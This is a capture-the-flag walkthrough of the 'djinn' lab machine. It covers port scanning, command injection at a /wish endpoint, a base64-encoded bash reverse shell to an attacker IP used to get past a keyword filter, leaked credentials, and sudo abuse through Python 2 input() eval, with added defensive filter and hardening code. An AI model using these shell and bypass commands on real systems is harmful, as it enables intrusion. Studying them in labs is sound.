1. Port scanning
The target VM prints its IP address directly on the console, so there is no need for host discovery.
Go straight to a port scan:
root@kali:~# nmap -sS -A 192.168.203.148 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 09:34 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.148
Host is up (0.00047s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp filtered ssh
MAC Address: 00:0C:29:63:02:D0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.203.148
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.28 seconds
Only port 21 is open, and port 22 is filtered. (It feels like this is testing port knocking again.)
Not entirely at ease, I went on to scan the full port range:
root@kali:~# nmap -sS -p1-65535 192.168.203.148
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-27 09:38 CST
Nmap scan report for 192.168.203.148
Host is up (0.00070s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp filtered ssh
1337/tcp open waste
7331/tcp open swx
MAC Address: 00:0C:29:63:02:D0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 14.92 seconds
Sure enough, some had slipped through the net: ports 1337 and 7331 are also open.
Checking port 1337 with telnet:
It turns out to be a game: answer 1000 questions and it will give us a gift, but we are certainly not going to answer 1000 times.
2. Vulnerability hunting
In a browser, I visited port 7331:
It is a page like this; I probed it with dirb:
But nothing turned up, because dirb's default wordlist is not strong enough:
Looking at dirb's wordlists under /usr/share/dirb/wordlists:
I chose big.txt for the brute-force, since it has the most entries:
But this raised another problem: although it could brute-force the paths, too many errors from the target machine caused it to abort.
In the end I used dirsearch with dirb's big.txt wordlist.
It found two directories, which I then visited:
The genie directory returns a 403:
The /wish directory looks like command execution:
Testing whoami echoes back www-data, confirming that the vulnerability exists.
3. Reverse shell
Start a listener on Kali.
An error came back; it seems the command was being filtered.
This can be worked around by base64-encoding the command and then piping it through base64 decoding to run it.
However, on checking, the target machine turned out not to have nc (although later, after getting a shell, it actually did have nc), so I switched to another command:
bash -i >& /dev/tcp/192.168.203.129/7777 0>&1
base64-encode it:
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMy4xMjkvNzc3NyAwPiYx
Then use the following command:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMy4xMjkvNzc3NyAwPiYx | base64 -d | bash
Got a shell:
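The reason the encoded variant got through is the security point worth keeping from this section: a filter that inspects the literal command string never sees what a base64 blob expands to. The following added example (not code from the writeup or from the djinn box; the box's real filter is not shown, so the substring denylist below is an assumption) puts a naive denylist next to the two command strings from the writeup, shows that decoding arguments before matching is what a detection needs, and shows the design that removes the problem entirely: an allowlist of fixed argv lists executed without a shell.

```python
import base64
import subprocess

# Constructed denylist standing in for the kind of keyword filter a command
# endpoint like /wish might apply (assumption: the page does not show the real one).
DENYLIST = ("/dev/tcp", "nc ", "python")

# The two command strings from the writeup.
DIRECT_CMD = "bash -i >& /dev/tcp/192.168.203.129/7777 0>&1"
ENCODED_CMD = (
    "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMy4xMjkvNzc3NyAwPiYx"
    " | base64 -d | bash"
)


def denylist_allows(cmd: str) -> bool:
    """True if a substring denylist would let this command string through.

    The filter only sees the literal text, so content hidden inside an
    encoded blob passes untouched."""
    return not any(bad in cmd for bad in DENYLIST)


def decode_payload(cmd: str) -> str:
    """What the encoded command really runs: the base64 argument before ' | base64'.

    A detection rule has to do this step before matching, otherwise it is
    blind to exactly the bypass used on the box."""
    blob = cmd.split()[1]
    return base64.b64decode(blob).decode()


# Hardened design: user text is never handed to a shell. The endpoint maps a
# small set of allowed names to fixed argv lists and runs them with shell=False,
# so there is nothing to encode around.
ALLOWED = {
    "whoami": ["whoami"],
    "id": ["id"],
}


def run_allowlisted(name: str) -> str:
    argv = ALLOWED.get(name.strip())
    if argv is None:
        raise ValueError("command not permitted: %r" % name)
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return result.stdout.strip()


if __name__ == "__main__":
    print("direct command passes denylist?  ", denylist_allows(DIRECT_CMD))
    print("encoded command passes denylist? ", denylist_allows(ENCODED_CMD))
    print("decoded payload passes denylist? ", denylist_allows(decode_payload(ENCODED_CMD)))
    print("allowlisted whoami ->", run_allowlisted("whoami"))
```

The denylist blocks the plain command and waves the encoded one through; decoding the argument first makes the same rule fire again. The allowlisted runner rejects anything that is not one of its fixed names, including "whoami; id", because the name is a dictionary key, not shell text.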
4. Privilege escalation
After poking around for a while, I found the privileges were very low:
Couldn't do anything.
Fortunately, looking for hidden files with ls -la turned up:
nitish:p4ssw0rdStr3r0n9
Since ssh isn't open, we switch users directly with su, and run sudo -l:
We can see that we can run genie as sam without a password.
Look at the usage with genie -h:
genie's help says that -p can give us a shell, but we did not get that shell.
Use the man command to read genie's more detailed manual:
There is a hidden piece of information: the -cmd parameter. Let's try it:
sudo -u sam genie -cmd id # run the id command as user sam
Now we have successfully obtained sam's privileges.
Run sudo -l again:
The sam user can run lago as root without the root password.
$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:4
4
work your ass off!!
$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:1
1
Working on it!!
$ sudo -u root /root/lago
sudo -u root /root/lago
What do you want to do ?
1 - Be naughty
2 - Guess the number
3 - Read some damn files
4 - Work
Enter your choice:2
2
Choose a number between 1 to 100:
Enter your number: num
num
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
lago proof.sh
# ./proof.sh
./proof.sh
'unknown': I need something more specific.
_ _ _ _ _
/ \ _ __ ___ __ _ ___(_)_ __ __ _| | | |
/ _ \ | '_ ` _ \ / _` |_ / | '_ \ / _` | | | |
/ ___ \| | | | | | (_| |/ /| | | | | (_| |_|_|_|
/_/ \_\_| |_| |_|\__,_/___|_|_| |_|\__, (_|_|_)
|___/
djinn pwned...
__________________________________________________________________________
Proof: 33eur2wjdmq80z47nyy4fx54bnlg3ibc
Path: /root
Date: Thu Feb 27 21:20:01 IST 2020
Whoami: root
__________________________________________________________________________
By @0xmzfr
Thanks to my fellow teammates in @m0tl3ycr3w for betatesting! :-)
This box did not go smoothly at all; from the directory brute-force at the start to the privilege escalation later, everything showed that I was not careful enough. And because I don't like reviewing code, I missed many clues.
Actually, the most important clue was right in the directory where we first landed with the shell:
In app.py we can get the information about the nitish user:
Later, once we had taken over the sam user, in /home/sam we saw a hidden pyc file.
Decompiling it:
#!/usr/bin/env python
# encoding: utf-8
# Decompiled from the hidden .pyc in /home/sam (Python 2 code, run as root via sudo)
from getpass import getuser
from os import system
from random import randint


def naughtyboi():
    print 'Working on it!! '


def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    # Python 2 input() evaluates the typed text as an expression, so typing
    # the name "num" yields the secret value itself and the comparison passes
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')  # spawns a root shell when lago is run through sudo
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'


if __name__ == '__main__':
    main(options())
This code explains why entering num gives us root: in Python 2, input() evaluates whatever is typed as an expression, so the text num is evaluated to the variable num itself, the check s == num is trivially true, and /bin/sh is spawned as root.
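To make that mechanism concrete, here is an added example (not code from the writeup or from the lago binary; it runs under Python 3) that emulates the Python 2 input() behaviour with an explicit eval over the same variable scope, next to a hardened version of the guess check that treats input as text and parses it strictly as an in-range integer.

```python
import random


def py2_input(text, namespace):
    """Emulate Python 2's input(): it is eval(raw_input()), so the typed text is
    evaluated as an expression with the caller's variables in scope.
    Builtins are stripped here because only the name lookup matters for the demo."""
    return eval(text, {"__builtins__": {}}, dict(namespace))


def guess_vulnerable(user_text, num):
    """Mirror of lago's guessit(): `s = input(...)` followed by `if s == num`."""
    s = py2_input(user_text, {"num": num})
    return s == num


def guess_fixed(user_text, num):
    """Hardened check: the input is plain text, parsed strictly as an integer
    and bounded to the range the prompt promises."""
    try:
        value = int(user_text.strip())
    except ValueError:
        return False
    if not 1 <= value <= 100:
        return False
    return value == num


def pick_secret():
    """The prompt says 1 to 100; the original randint(1, 101) could also return 101,
    which no honest guess could ever match."""
    return random.randint(1, 100)


if __name__ == "__main__":
    secret = pick_secret()
    print("vulnerable, typing 'num' ->", guess_vulnerable("num", secret))
    print("fixed, typing 'num'      ->", guess_fixed("num", secret))
    print("fixed, typing the number ->", guess_fixed(str(secret), secret))
```

The vulnerable path accepts any expression that evaluates to the secret, including the name num and arithmetic; the fixed path accepts only a literal integer between 1 and 100, which is the whole input space the game intended.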
Reference article by an expert: https://blog.csdn.net/fastergohome/article/details/103537057
It also includes a Python script that plays through the 1000 arithmetic questions; impressive, and something to learn from!